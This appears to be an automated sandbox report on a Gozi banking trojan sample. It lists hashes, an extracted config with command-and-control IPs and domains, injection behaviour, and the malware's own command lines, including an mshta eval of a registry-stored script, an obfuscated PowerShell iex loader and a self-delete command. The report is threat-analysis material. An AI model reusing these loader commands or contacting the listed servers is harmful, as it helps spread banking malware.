gozi | d5c77653349176a796c3846dfc596292563d0588564eabf542c978b61597278a

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

295KB
MD5

b54e56a2503ac379bcd8e61852d5e861
SHA1

abcfaff56afa6239ac8efaf8e36ef22b6cc9e8d9
SHA256

d5c77653349176a796c3846dfc596292563d0588564eabf542c978b61597278a
SHA512

fa22a6d5369dd5a06647752ea9ec9f335fe57682931b6808bcd4dd84a3eac5d33f0ec525e23f893b820c6b0e76f46c53ae3cf14ecfbf4e468730dcff817a6513
SSDEEP

3072:w6JyBmvmBEayo1tFHtWl0VnkDS7cW6VnYR4UhsyT+dNIY:xJyIv4EayofFNVtMns4y7T+r

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2724 cmd.exe

pid	process
2724	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3052 set thread context of 1192	3052	powershell.exe	Explorer.EXE
PID 1192 set thread context of 2724	1192	Explorer.EXE	cmd.exe
PID 2724 set thread context of 1060	2724	cmd.exe	PING.EXE
PID 1192 set thread context of 1608	1192	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1060 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1060 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1060	PING.EXE

pid	process
1060	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1080	client.exe
3052	powershell.exe
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1192 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3052 powershell.exe
1192 Explorer.EXE
2724 cmd.exe
1192 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3052 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1192 Explorer.EXE

pid	process
1192	Explorer.EXE

pid	process
3052	powershell.exe
1192	Explorer.EXE
2724	cmd.exe
1192	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	3052	powershell.exe

pid	process
1192	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2508 wrote to memory of 3052	2508	mshta.exe	powershell.exe
PID 2508 wrote to memory of 3052	2508	mshta.exe	powershell.exe
PID 2508 wrote to memory of 3052	2508	mshta.exe	powershell.exe
PID 3052 wrote to memory of 2808	3052	powershell.exe	csc.exe
PID 3052 wrote to memory of 2808	3052	powershell.exe	csc.exe
PID 3052 wrote to memory of 2808	3052	powershell.exe	csc.exe
PID 2808 wrote to memory of 1376	2808	csc.exe	cvtres.exe
PID 2808 wrote to memory of 1376	2808	csc.exe	cvtres.exe
PID 2808 wrote to memory of 1376	2808	csc.exe	cvtres.exe
PID 3052 wrote to memory of 2408	3052	powershell.exe	csc.exe
PID 3052 wrote to memory of 2408	3052	powershell.exe	csc.exe
PID 3052 wrote to memory of 2408	3052	powershell.exe	csc.exe
PID 2408 wrote to memory of 1756	2408	csc.exe	cvtres.exe
PID 2408 wrote to memory of 1756	2408	csc.exe	cvtres.exe
PID 2408 wrote to memory of 1756	2408	csc.exe	cvtres.exe
PID 3052 wrote to memory of 1192	3052	powershell.exe	Explorer.EXE
PID 3052 wrote to memory of 1192	3052	powershell.exe	Explorer.EXE
PID 3052 wrote to memory of 1192	3052	powershell.exe	Explorer.EXE
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2724	1192	Explorer.EXE	cmd.exe
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 2724 wrote to memory of 1060	2724	cmd.exe	PING.EXE
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 1608	1192	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>To41='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(To41).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\30BA078A-CF87-E252-D964-73361DD857CA\\\TimeContact'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wktxfvgt -value gp; new-alias -name xdllgdkfe -value iex; xdllgdkfe ([System.Text.Encoding]::ASCII.GetString((wktxfvgt "HKCU:Software\AppDataLow\Software\Microsoft\30BA078A-CF87-E252-D964-73361DD857CA").ChartText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b169yffl.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9D39.tmp"
5⤵
PID:1376

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ktrcqla.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E43.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9E42.tmp"
5⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1060

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5ktrcqla.dll

Filesize
3KB

MD5
0b29d0ecf7abf9521301550f7fa51770

SHA1
09b918eabe2516c3eeb0879990205d80933adb69

SHA256
a778c29c8661d3779a371d732656db13dfd870038442ed6fbb6d2997fc54baf7

SHA512
7d4ce25ae74baa8fe6fb803cc6235f7badd4162cb314b894d0b6c3dfea9b9995b895ffc069ed1aec79a6819fdd76cade6a0c7f512e83a25a45774fd9c9570fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ktrcqla.pdb

Filesize
7KB

MD5
45d483b6d79a7772c4f67ecbe6671e8f

SHA1
f8a1dbd557f802e241257bd26f1040053bb8e55b

SHA256
ee24fdd2a55a20aa64bfaece327913d516ca9a67cff315762df246cc2650d5ca

SHA512
21f0e46f0553d60c02a566ce46f83e927ebf45225a0d5bce478fd4fa5e90d2664332f85b74e36ecd0c029d5348b8664ff2fe00f1dcfb65f0a556056d42a692ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D4A.tmp

Filesize
1KB

MD5
a0cf8d76dbc5e320a67a1dd02cffcec3

SHA1
1ea07f6f462406229d8efc47eda5be012b33c048

SHA256
540e085ebd44b36c68e701431d5940f57cae6e66254579dc6bff66b99b1d636e

SHA512
06ea6c683fccfd2c1c52e1b90a570d692c65747a6c575f30d20e984e0be641f9d9fc2bf4e8959dca5486536f6f33360aa2420c48ce53d593aa7a544d0700c3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E43.tmp

Filesize
1KB

MD5
580a99e52aaded988b99a18218d1dc93

SHA1
6a7ee715786682348f158763be297a614f0759f0

SHA256
3d3038978ffcd16f2c6795a7e4e337a85d59298ceb6d8b4957b1cc1bcc216399

SHA512
396aa5a30837858600e7a091829fee2ac1ffeee32e4cfe59c0cac6db2040c52dcdb1905d7a0384cd70c22816f1a5c5a4deefacd1b26b09ce1b34cc1b2e66fd8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\b169yffl.dll

Filesize
3KB

MD5
0552fc0556510a998186d1cd9ab08194

SHA1
2969ffc9d466ad3909196c1733798949e000a2ab

SHA256
08032c4370268efe97fb2b91cde364cc2cd9a7d17e9741f3b54c77a22a77c2c0

SHA512
d9599fb7509238fc5caf6cae567dc6b69ee6cd8a76ffc4041cd58725d8fa721e5741dfa23bf3b18709f280d0419c5f0d1d2b6d99fbeec2e5d7c462b39fa02452

Download Submit
C:\Users\Admin\AppData\Local\Temp\b169yffl.pdb

Filesize
7KB

MD5
e2cf67fb872f0cf8b2d016d1979ee1bb

SHA1
145329ab304ce391b7536dac3325618e442c18b1

SHA256
0b6c64f96e246bf68025219a995d1dfdb284e06d39e701152fbacaedc90a3e98

SHA512
990c426b14c59eb688a12beafe42d36a85060047cf497da7cbcb9e928e83a6ec3aba62f9e85448455cd5365e532a8158e5c2d6a8462a6387bd16218c472b80da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5ktrcqla.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5ktrcqla.cmdline

Filesize
309B

MD5
6d81068f527466ba74e89139181a62cc

SHA1
22bbb9ebca3fabca744e96a20dc90d86f2836e1a

SHA256
95675c0e992cb34f894f4dc82f7898beb5e3dd638b92fa134f5d695276a45ef8

SHA512
febb3bf99160a8502a4b48dc3c7f33fc55599240874a927e1045711729435d3bd045e7058fc61a80cc79a486fe2a255a68c2809bb0ad33e185b2ca0a70fb832e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9D39.tmp

Filesize
652B

MD5
7bda1efebd7116bfff97bd4625db04c0

SHA1
9e3af3217b80cc5cee98e0e0f5e61d2fb141d99a

SHA256
0e3357ee6946892a81dd3e7eb070b16472d836ae3c39741e310285e658e651fa

SHA512
1f2f91db1218cdd7a4ba15ec6e5ef1ba2fc23608e6da9ad6cb73a37b56a3b5d9f3894d7831c311ae96fb8b9b6eaac7ef997e80915eb578455123d9bfc07ee22b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9E42.tmp

Filesize
652B

MD5
e76a575fdebb02852cf93315b44e6357

SHA1
c9fe0552a79cb2f93e794a5202a923dadd94e13e

SHA256
c9bace90952f7b05bd729f5bfd5e7b973df6a488e4b421c375fbb98fc36b9903

SHA512
e4ad6c395eb7d8739e22039848728510785c964f9699909989e0965e516d64ae2818fdf36b909d45985b403912ff9bcc26213bd5019df90b20c6824f32e1ecdc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b169yffl.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b169yffl.cmdline

Filesize
309B

MD5
56036e8e6a38b2443841c7b6dd6f6830

SHA1
866dcac53d6d23ea1dd867f0f2682dd95e74c829

SHA256
d7bbea1c13773fbc182536bd060d28c7ce8e3e1e023268c947c2597687be7a3f

SHA512
dac7aa1b1f65ff54b6ea4d691d16f7e08106cb6b8739e6385e5c9669103527af4a1109bc5e6dfaa356cafc09320fba35ec2b919ab3733b8be9087c9565e1dcad

Download Submit
memory/1060-76-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/1060-78-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/1060-90-0x0000000000370000-0x0000000000414000-memory.dmp

Filesize
656KB

Download
memory/1060-77-0x0000000000370000-0x0000000000414000-memory.dmp

Filesize
656KB

Download
memory/1080-8-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1080-2-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1080-3-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download
memory/1080-1-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/1080-4-0x0000000000250000-0x000000000025D000-memory.dmp

Filesize
52KB

Download
memory/1080-7-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/1080-10-0x00000000051A0000-0x00000000051A2000-memory.dmp

Filesize
8KB

Download
memory/1192-57-0x0000000004AA0000-0x0000000004B44000-memory.dmp

Filesize
656KB

Download
memory/1192-89-0x0000000004AA0000-0x0000000004B44000-memory.dmp

Filesize
656KB

Download
memory/1192-58-0x0000000003AB0000-0x0000000003AB1000-memory.dmp

Filesize
4KB

Download
memory/1608-92-0x00000000001E0000-0x0000000000278000-memory.dmp

Filesize
608KB

Download
memory/1608-85-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/1608-86-0x00000000001E0000-0x0000000000278000-memory.dmp

Filesize
608KB

Download
memory/1608-82-0x00000000001E0000-0x0000000000278000-memory.dmp

Filesize
608KB

Download
memory/2408-47-0x00000000007C0000-0x0000000000840000-memory.dmp

Filesize
512KB

Download
memory/2724-69-0x0000000001CA0000-0x0000000001D44000-memory.dmp

Filesize
656KB

Download
memory/2724-70-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/2724-91-0x0000000001CA0000-0x0000000001D44000-memory.dmp

Filesize
656KB

Download
memory/2724-68-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/2808-27-0x0000000002120000-0x00000000021A0000-memory.dmp

Filesize
512KB

Download
memory/3052-21-0x000007FEF2D60000-0x000007FEF36FD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-53-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

Filesize
32KB

Download
memory/3052-36-0x0000000002800000-0x0000000002808000-memory.dmp

Filesize
32KB

Download
memory/3052-56-0x000000001B2D0000-0x000000001B30D000-memory.dmp

Filesize
244KB

Download
memory/3052-60-0x000007FEF2D60000-0x000007FEF36FD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-20-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/3052-19-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/3052-18-0x0000000001E60000-0x0000000001EE0000-memory.dmp

Filesize
512KB

Download
memory/3052-17-0x000007FEF2D60000-0x000007FEF36FD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-16-0x00000000024A0000-0x00000000024A8000-memory.dmp

Filesize
32KB

Download
memory/3052-61-0x000000001B2D0000-0x000000001B30D000-memory.dmp

Filesize
244KB

Download
memory/3052-15-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

Filesize
2.9MB

Download